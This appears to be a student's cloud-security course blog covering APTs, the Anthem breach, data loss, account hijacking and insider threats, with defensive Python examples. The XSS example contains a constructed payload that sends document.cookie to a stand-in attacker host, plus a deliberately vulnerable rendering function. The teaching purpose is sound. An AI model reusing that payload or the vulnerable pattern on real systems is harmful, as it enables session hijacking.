Thursday, May 25, 2017

Week 11 Assignment

Advanced Persistent Threats (APTs) are a parasitical form of cyberattack that infiltrates systems to establish a foothold in the computing infrastructure of target companies, from which the attackers smuggle out data and intellectual property (CSA, 2016). APTs act stealthily over extended periods of time and adapt to the security measures intended to defend against them. Common points of entry are spear phishing, direct hacking attacks, USB devices preloaded with malicious code, compromised third-party networks, etc. Once in place, APTs blend in with normal traffic and move through data center networks undetected.

“Carbanak, a major advanced persistent threat (APT) attack against financial institutions around the world, may be considered the largest cyberheist to date… Unlike the usual cybercriminal method of stealing consumer credentials or compromising individual online banking sessions with malware, the brazen Carbanak gang targeted banks’ internal systems and operations, resulting in a multichannel robbery that averaged $8 million per bank” (Kessem, L. 2015).  
According to the article, the main factor that let the attackers cause such damage was inadequate security controls. Internal core systems were not well protected because banks did not expect an attack from within. The heist started slowly: the initial infiltration was facilitated by spear phishing emails with exploit-laden attachments that compromised employee endpoints with malware.

Although APT attacks can be difficult to detect and eliminate, some can be stopped with proactive security measures. It is critical that users be educated to recognize and handle social engineering techniques, so awareness programs should be regularly reinforced. IT departments should keep up with the latest advanced attacks. Defending against APTs may require more advanced security controls, process management, incident response plans and IT staff training, which leads to increased security budgets. Organizations should weigh these costs against the potential economic damage inflicted by successful APT attacks.

Resources:
Kessem, L. (2015, February 23), Carbanak: How Would You Have Stopped a $1 Billion APT Attack?, retrieved from https://securityintelligence.com/carbanak-how-would-you-have-stopped-a-1-billion-apt-attack/

The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf

Wednesday, May 17, 2017

Week 10 Assignment

On January 29, 2015, the health insurance company Anthem, Inc. discovered that hackers had gained unauthorized access to Anthem’s IT systems and that nearly 80 million records containing Personally Identifiable Information (PII) had been stolen. The hackers used phishing attacks to obtain the network credentials of at least five employees with high-level IT access. Data from the attack is expected to be sold on the black market.

Anthem’s breach was the result of insufficient identity, credential and access management, which is also a top concern in cloud computing environments. Data breaches can occur due to the lack of scalable identity and access management systems, failure to use multifactor authentication, weak password use, and a lack of ongoing automated rotation of cryptographic keys, passwords and certificates (CSA, 2016). Several factors allowed the attack on Anthem to succeed: the data was not encrypted, too many of Anthem’s employees may have had too much access to the system, and multifactor authentication was not deployed.

Identity systems must scale to support the lifecycle management for millions of users, including immediate de-provisioning of accounts upon job termination or role change.

Credentials and cryptographic keys should not be embedded in source code or stored in public-facing repositories such as GitHub. Keys need to be well protected and rotated periodically, and a secured public key infrastructure (PKI) should be in place to ensure proper key management.
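A practical check for the first of these recommendations is to scan source before it is committed for material that looks like a credential. The following is an added example written for this post, not code from the CSA report or from any scanning product. It recognises the documented AWS access key ID format (AKIA followed by 16 characters), a 40-character AWS secret, PEM private key headers, and generic password/token assignments; for the assignment-style rules it uses Shannon entropy to ignore obvious placeholders such as "changeme". The sample source file is constructed for the example, and the AWS values in it are the placeholder credentials AWS publishes in its own documentation.

```python
import math
import re
from collections import Counter

# Rules are tried in order; the first rule that fires on a line wins.
# The AWS access key ID format (AKIA + 16 chars) and the 40-character AWS
# secret are documented formats; the password/token rules are heuristics.
RULES = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("aws_secret_access_key", re.compile(
        r"""(?i)aws[_-]?secret[_-]?access[_-]?key\s*[:=]\s*['"]([A-Za-z0-9/+=]{40})['"]""")),
    ("private_key_block", re.compile(
        r"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")),
    ("hardcoded_password", re.compile(
        r"""(?i)(?:password|passwd|pwd|secret)\s*[:=]\s*['"]([^'"]{6,})['"]""")),
    ("generic_token", re.compile(
        r"""(?i)(?:api[_-]?key|access[_-]?key|token|secret[_-]?key)\s*[:=]\s*['"]([A-Za-z0-9+/=_\-]{20,})['"]""")),
]


def shannon_entropy(s: str) -> float:
    """Bits per character; random secrets score high, dictionary words score low."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def scan_source(text: str, min_entropy: float = 3.0):
    """Return (line_no, rule, value) for each line that appears to embed a credential.

    Rules with a capture group (password/token assignments) are only reported when
    the captured value looks random enough (entropy >= min_entropy); exact-format
    rules (AWS key ID, PEM header) are always reported. At most one finding per line.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            m = pattern.search(line)
            if not m:
                continue
            value = m.group(1) if m.groups() else m.group(0)
            if m.groups() and shannon_entropy(value) < min_entropy:
                continue  # placeholder such as "changeme", not a real secret
            findings.append((line_no, rule, value))
            break
    return findings


# Constructed sample file. The AWS values are the placeholders from AWS's own
# documentation; the api_key value is made up for this example.
SAMPLE_SOURCE = """\
import boto3
region = "us-east-1"
AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
aws_secret_access_key = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
db_password = "changeme"
api_key = "q7XnT2pLmV9bZsR4wKd8yHc3Ef6Gj1Na"
-----BEGIN RSA PRIVATE KEY-----
"""

if __name__ == "__main__":
    for line_no, rule, value in scan_source(SAMPLE_SOURCE):
        print(f"line {line_no}: {rule}: {value[:12]}...")
```

Run as a pre-commit hook (or over `git diff --cached`), this catches the keys before they reach a remote; the same rules can be pointed at an existing repository's history, because a secret that was ever pushed to a public repository must be treated as compromised and rotated, not merely deleted from the current tree.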

Multifactor authentication systems such as smart cards, one-time passwords (OTP), phone-based authentication, etc. are required in cloud environments. For legacy systems that use passwords alone, a policy should be implemented to enforce strong password creation and define password rotation.

Organizations planning to federate identity with a cloud provider need to understand the security processes, infrastructure and segmentation between customers implemented by the provider to protect the identity platform. Organizations must consider the trade-off of centralizing identity against the risk of having that single repository become a target of high interest to attackers.

Resources:
Hiltzik, M., (2015, March 6), Anthem is warning consumers about its huge data breach. Here's a translation., retrieved from http://www.latimes.com/business/la-fi-mh-anthem-is-warning-consumers-20150306-column.html

The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf

Rashid, F., (2016, March 11), The dirty dozen: 12 cloud security threats, retrieved from http://www.infoworld.com/article/3041078/security/the-dirty-dozen-12-cloud-security-threats.html

Thursday, May 11, 2017

Week 9 Assignment

The risk of a data breach is not unique to cloud computing, but it remains a top security concern for cloud customers. A data breach is an incident in which sensitive, protected or confidential information is released, viewed, stolen or used by an individual who is not authorized to do so. Cloud environments are exposed to the same threats as traditional corporate networks, but they also provide new avenues of attack because of their high accessibility and shared resources. The vast amount of data that cloud providers host makes them a very attractive target.

A data breach can be the result of human error, application vulnerabilities or poor security practices. It may involve personal health information, financial information, personally identifiable information (PII), trade secrets, intellectual property or any other information not intended for public release.

The impact of a breach depends on the sensitivity of the data exposed. When a data breach occurs, companies may face large fines, lawsuits or criminal charges. There are also costs associated with investigations, customer notification and legal services. Indirect effects such as brand damage and loss of business can have an even more devastating impact on the organization.

In 2015 the antivirus firm Bitdefender suffered a security breach involving stolen usernames and passwords, caused by a security vulnerability in its public cloud application hosted on AWS. The hacker responsible demanded a ransom of $15,000. The company was quick to resolve the issue and put additional security measures in place to prevent a recurrence. As an extra precaution, a password reset notice was sent to all potentially affected customers.

Cloud providers typically have good security controls in place for their environments, but customers are ultimately responsible for protecting their data in the cloud. An effective security program should be implemented, along with multifactor authentication and encryption.

Resources:
The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf
Rashid, F., (2016, March 11), The dirty dozen: 12 cloud security threats, retrieved from http://www.infoworld.com/article/3041078/security/the-dirty-dozen-12-cloud-security-threats.html
Goldman, J., (2015, August 6), Bitdefender Acknowledges Data Breach, retrieved from http://www.esecurityplanet.com/network-security/bitdefender-acknowledges-data-breach.html

Wednesday, May 3, 2017

Week 8 Assignment

Permanent data loss is still one of the biggest fears organizations face when opting for cloud services. Hackers may deliberately delete cloud data to harm businesses and ruin cloud providers’ reputations. Cloud data centers are also as vulnerable to natural disasters as any other facility.

Preventing data loss is a shared responsibility, and cloud providers recommend distributing data and applications across multiple zones for added protection. Data backups are essential, as is off-site data storage. As for the customer’s responsibilities: if data is encrypted before it is uploaded to the cloud, careful measures must be taken to protect the encryption key. Once the key is lost, so is the data.
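The last point deserves a concrete control, because a backed-up ciphertext is worthless without its key. One standard way to keep a customer-held data encryption key recoverable without handing any single person the whole key is Shamir secret sharing: the key is split into n shares held by different custodians (for example a security officer, a backup officer and an offline escrow), and any k of them reconstruct it, while fewer than k reveal nothing. The code below is an added example written for this post, not code from Amazon or from any cited article; it implements the scheme over GF(2^8) with the Python standard library only. In production one would use a reviewed library or a cloud KMS with the same threshold semantics, but the arithmetic is shown in full here so the recovery property can be checked.

```python
import secrets


def _gf_mul(a: int, b: int) -> int:
    """Multiply in GF(2^8) with the AES reduction polynomial x^8+x^4+x^3+x+1."""
    p = 0
    for _ in range(8):
        if b & 1:
            p ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return p


def _gf_inv(a: int) -> int:
    """Multiplicative inverse as a^254 (Fermat); valid for a != 0."""
    result, base, exp = 1, a, 254
    while exp:
        if exp & 1:
            result = _gf_mul(result, base)
        base = _gf_mul(base, base)
        exp >>= 1
    return result


def split_key(key: bytes, n: int, k: int) -> dict:
    """Split `key` into n shares {x: bytes}; any k shares recover it, fewer reveal nothing.

    Each key byte becomes the constant term of a random degree-(k-1) polynomial,
    which is evaluated at x = 1..n; share x holds the evaluations for every byte.
    """
    if not 1 <= k <= n <= 255:
        raise ValueError("need 1 <= k <= n <= 255")
    shares = {x: bytearray() for x in range(1, n + 1)}
    for byte in key:
        coeffs = [byte] + [secrets.randbelow(256) for _ in range(k - 1)]
        for x in range(1, n + 1):
            y = 0
            for c in reversed(coeffs):  # Horner evaluation of the polynomial at x
                y = _gf_mul(y, x) ^ c
            shares[x].append(y)
    return {x: bytes(v) for x, v in shares.items()}


def recover_key(shares: dict) -> bytes:
    """Lagrange-interpolate each byte's polynomial at x = 0 from the given shares."""
    xs = list(shares)
    length = len(next(iter(shares.values())))
    out = bytearray()
    for i in range(length):
        acc = 0
        for xj in xs:
            num = den = 1
            for xm in xs:
                if xm != xj:
                    num = _gf_mul(num, xm)       # (0 - x_m) == x_m in characteristic 2
                    den = _gf_mul(den, xj ^ xm)  # (x_j - x_m)
            acc ^= _gf_mul(shares[xj][i], _gf_mul(num, _gf_inv(den)))
        out.append(acc)
    return bytes(out)


if __name__ == "__main__":
    dek = secrets.token_bytes(32)            # the customer's data encryption key
    custodians = split_key(dek, n=3, k=2)    # three custodians, any two suffice
    del custodians[2]                        # one custodian loses their share
    assert recover_key(custodians) == dek    # the data is still recoverable
    print("key recovered from 2 of 3 shares")
```

The shares themselves then need to be stored in separate places (different custodians, different sites), since the point of the split is that no single loss, and no single insider, takes the key with it.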

On April 21, 2011, Amazon experienced a massive service outage that caused service disruption; approximately 11 hours of historical data could not be recovered and appeared as small gaps in the timeline. The root cause was a mistake made by Amazon’s engineers that triggered a cascade of other bugs and glitches. A detailed description of the incident is given in the articles cited below.

Compliance policies dictate how long organizations must retain documents and audit records, and losing such data can have serious consequences. Providers and cloud customers should take adequate measures to back up data and follow best practices in business continuity and data recovery.

Resources:
Rashid, F., (2016, March 11), The dirty dozen: 12 cloud security threats, retrieved from http://www.infoworld.com/article/3041078/security/the-dirty-dozen-12-cloud-security-threats.html
Goldman, D., (2011, April 29), Amazon explains its cloud disaster, retrieved from http://money.cnn.com/2011/04/29/technology/amazon_apology/

Blodget, H., (2011, April 28), Amazon's Cloud Crash Disaster Permanently Destroyed Many Customers' Data, retrieved from http://www.businessinsider.com/amazon-lost-data-2011-4

Thursday, April 27, 2017

Week 7 Assignment

The focus of this week’s post is account hijacking in the cloud environment. So what is account hijacking? An article by Digital Guardian describes it as “a process in which an individual or organization’s cloud account is stolen or hijacked by an attacker”. The stolen account information is later used to conduct malicious or unauthorized activity. The cloud environment is especially vulnerable to attacks of this sort because of the huge amount of data stored in one place and the multiple accounts sharing resources across the network.

An example of an account hijacking attack happened on April 20, 2010, when cross-site scripting (XSS) was used to steal session IDs from Amazon Wireless customers. Session IDs are used to grant users access to their online accounts after they enter their password, so a stolen session ID lets the attacker act as the victim without knowing the password. It took the security team 12 hours to fix the bug after it was first brought to their attention.
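To make the mechanism concrete, the following added example (written for this post, not the Amazon code or anything from the cited article; the page layout and the attacker URL are made up) shows a reflected XSS bug in a search page, the same page with the untrusted value HTML-encoded, and a session cookie issued with the HttpOnly, Secure and SameSite attributes so that even a surviving injection cannot read the session ID through document.cookie. The details of the 2010 Amazon bug are not public in the source, so this is the generic pattern, not a reconstruction of that incident.

```python
import html
from http.cookies import SimpleCookie

# Constructed attacker input. If it is reflected unencoded, the victim's browser
# runs it and sends the cookies (including the session ID) to the attacker's host.
ATTACKER_QUERY = (
    '<script>new Image().src="https://attacker.example/?c="'
    '+document.cookie</script>'
)


def render_search_vulnerable(query: str) -> str:
    """Reflects the search term straight into the markup (reflected XSS)."""
    return f"<h1>Results for: {query}</h1>"


def render_search_hardened(query: str) -> str:
    """Same page, but the untrusted value is HTML-encoded before it reaches the markup."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Build the Set-Cookie value for a session ID.

    HttpOnly keeps the value out of document.cookie, so injected script cannot
    read it; Secure keeps it off plaintext HTTP; SameSite=Lax stops most
    cross-site requests from carrying it. These limit the damage of an XSS bug,
    they do not replace fixing the output encoding.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = secure
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def script_reaches_browser(page: str) -> bool:
    """True when a live <script> tag survives into the rendered page."""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(ATTACKER_QUERY))
    print(render_search_hardened(ATTACKER_QUERY))
    print("Set-Cookie:", session_cookie_header("9f3b1c2d"))
```

Note that the cookie attributes require Python 3.8 or later for SameSite support in `http.cookies`; the encoding fix works on any version. Encoding must be applied at the output point for the context the value lands in (HTML body here; attribute, URL and JavaScript contexts need their own encoders).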

Account hijacking attacks can damage an organization’s reputation and integrity when confidential data is leaked or lost, causing significant cost to businesses or their customers. Experts suggest the following steps to protect data in the cloud: strong authentication for cloud app users, backing up data in case of data loss, restricting the IP addresses allowed to access cloud applications, multi-factor authentication, and encrypting data before it is sent to the cloud.

Resources:
Lord, N., (2015, September 28), What is Cloud Account Hijacking?,  retrieved from https://digitalguardian.com/blog/what-cloud-account-hijacking

Goodin, D., (2010, April 20), Amazon purges account hijacking threat from site, retrieved from http://www.theregister.co.uk/2010/04/20/amazon_website_treat/

Wednesday, April 19, 2017

Week 6 Assignment

For this week’s post I am going to look at shared technology vulnerabilities as a security concern in cloud computing.
Cloud providers deliver services by sharing infrastructure, platforms and applications. One of the essential characteristics of the cloud is resource pooling: the resources used to provide the cloud service are realized on a homogeneous infrastructure that is shared between all service users. The underlying components of the infrastructure supporting the cloud may not have been designed with the strong isolation properties needed for IaaS, PaaS and SaaS. This can lead to shared technology vulnerabilities that can be exploited in all service models. The impact of a compromised piece of shared technology can be devastating and potentially affect the entire cloud. Because resource pooling lets several customers share network infrastructure components, vulnerabilities in DNS servers, DHCP or the IP protocol itself might enable a network-based cross-tenant attack.

To mitigate the risks of shared technology vulnerabilities, multifactor authentication should be implemented on all hosts, along with host-based intrusion detection systems (HIDS) and network-based intrusion detection systems (NIDS). A defense-in-depth strategy can be used for security enforcement and monitoring. Another point to mention is the partnership between the cloud provider and the customer: the security of the cloud is a shared responsibility, and both sides need to take preventive actions to protect the infrastructure, services and data.

Resources:
The Treacherous 12 Cloud Computing Top Threats in 2016, (February 2016), prepared by the Cloud Security Alliance, retrieved from https://downloads.cloudsecurityalliance.org/assets/research/top-threats/Treacherous-12_Cloud-Computing_Top-Threats.pdf
Grobauer, B., Walloscheck, T., Stöcker, E., (2011, August 15), Understanding Cloud Computing Vulnerabilities, retrieved from https://www.infoq.com/articles/ieee-cloud-computing-vulnerabilities
Ma, Joy, (2015, December 14), Top 10 Security Concerns for Cloud-Based Services, retrieved from https://www.incapsula.com/blog/top-10-cloud-security-concerns.html

Wednesday, April 12, 2017

Week 5 Assignment

One of the serious concerns when it comes to cloud computing security is the malicious insider threat. According to CERT, a malicious insider is a “current or former employee, contractor, or other business partner who has or had authorized access to an organization’s network, system or data and intentionally exceeded or misused that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization’s information or information systems.”
Malicious insiders can gain increasing levels of access to critical systems across IaaS, PaaS and SaaS, yet despite this concern cloud computing use continues to grow. There are three types of cloud-related insider threats:
  • Rogue administrator: this administrator is employed by the cloud provider, and the motivation behind the attack is often financial, resulting in theft of sensitive information and loss of confidentiality and integrity.
  • Insider within the organization who exploits vulnerabilities exposed by the use of cloud services. This is often enabled by differences in security policies or access control between the cloud provider and the organization.
  • Insider who uses cloud services to carry out an attack on his own employer. The difference here is that the insider uses the cloud as a tool to attack targeted systems or data that are not necessarily associated with the cloud-based systems.

There are countermeasures that both organizations and providers should consider. On the client side, IDS/IPS mechanisms may be implemented, along with cryptographic techniques to protect the confidentiality and integrity of their data. Steps the provider can take to minimize the risk of an insider threat include separation of duties, logging of user and administrator actions, legal bindings, insider detection models, anomaly detection, and multi-factor authentication.
Cloud computing offers business efficiency improvements but also provides new possibilities for insider attacks. To protect themselves, organizations need to be aware of the vulnerabilities related to cloud computing services and the access they provide to employees.
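Three of the provider-side countermeasures above (separation of duties, logging of administrator actions, and anomaly detection) only bite if someone actually evaluates the logs. The following added example, written for this post and not taken from the cited papers, runs three simple rules over a constructed administrator audit log: a privileged action that was self-approved or not approved at all, an administrator touching a tenant outside their assignment, and an administrator whose daily volume of data access exceeds a baseline. The log format, the tenant assignments and the threshold are assumptions for the example.

```python
from collections import Counter

# Actions that must be approved by a second person (separation of duties).
PRIVILEGED_ACTIONS = {"snapshot.export", "key.rotate"}
# Actions that read customer data and therefore count toward volume anomalies.
DATA_ACCESS_ACTIONS = {"volume.read", "snapshot.export"}

# Assumed assignment of provider administrators to the tenants they may service.
ASSIGNMENTS = {
    "alice": {"acme"},
    "bob": {"globex"},
    "carol": {"initech"},
    "dave": {"initech"},
}

# Constructed audit log (timestamp followed by key=value fields).
SAMPLE_AUDIT_LOG = """\
2017-05-01T09:12:03Z actor=alice action=volume.read tenant=acme approver=-
2017-05-01T09:14:10Z actor=alice action=volume.read tenant=acme approver=-
2017-05-01T09:31:55Z actor=alice action=volume.read tenant=acme approver=-
2017-05-01T09:47:02Z actor=alice action=volume.read tenant=acme approver=-
2017-05-01T10:02:18Z actor=bob action=volume.read tenant=globex approver=-
2017-05-01T10:05:21Z actor=bob action=volume.read tenant=acme approver=-
2017-05-01T22:03:17Z actor=carol action=snapshot.export tenant=initech approver=carol
2017-05-01T22:05:40Z actor=carol action=snapshot.export tenant=initech approver=dave
2017-05-02T08:30:00Z actor=dave action=volume.read tenant=initech approver=-
"""


def parse_audit_log(text: str) -> list:
    """Turn each non-empty log line into a dict of its fields plus the timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        event = {"ts": ts}
        for field in fields:
            key, _, value = field.partition("=")
            event[key] = value
        events.append(event)
    return events


def detect_insider_activity(events: list, assignments: dict, bulk_threshold: int = 4) -> list:
    """Return (rule, actor, when) alerts for the three insider-threat rules.

    separation_of_duties: privileged action with no approver or self-approval.
    unassigned_tenant:    actor worked on a tenant outside their assignment.
    bulk_access:          at least bulk_threshold data accesses by one actor in one day.
    """
    alerts = []
    daily = Counter()
    for ev in events:
        actor, action, tenant = ev["actor"], ev["action"], ev["tenant"]
        approver = ev.get("approver", "-")
        if action in PRIVILEGED_ACTIONS and approver in ("-", actor):
            alerts.append(("separation_of_duties", actor, ev["ts"]))
        if tenant not in assignments.get(actor, set()):
            alerts.append(("unassigned_tenant", actor, ev["ts"]))
        if action in DATA_ACCESS_ACTIONS:
            daily[(actor, ev["ts"][:10])] += 1
    for (actor, day), count in sorted(daily.items()):
        if count >= bulk_threshold:
            alerts.append(("bulk_access", actor, day))
    return alerts


if __name__ == "__main__":
    for rule, actor, when in detect_insider_activity(parse_audit_log(SAMPLE_AUDIT_LOG), ASSIGNMENTS):
        print(f"{when} {rule}: {actor}")
```

The bulk threshold is a stand-in for a baseline learned from each administrator's normal activity; in a real deployment it would be derived per role and per tenant rather than fixed. The value of logging here depends on the log itself being write-once and out of reach of the administrators it records, otherwise a rogue administrator simply edits it.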

Resources:
Claycomb, William & Nicoll, Alex, (n.d.), Insider Threats to Cloud Computing: Directions for New Research Challenges, retrieved from http://resources.sei.cmu.edu/asset_files/WhitePaper/2012_019_001_52385.pdf

Miltiadis Kandias, Nikos Virvilis, Dimitris Gritzalis, (2011), The Insider Threat in Cloud Computing, retrieved from https://www.infosec.aueb.gr/Publications/CRITISCloud%20Insider.pdf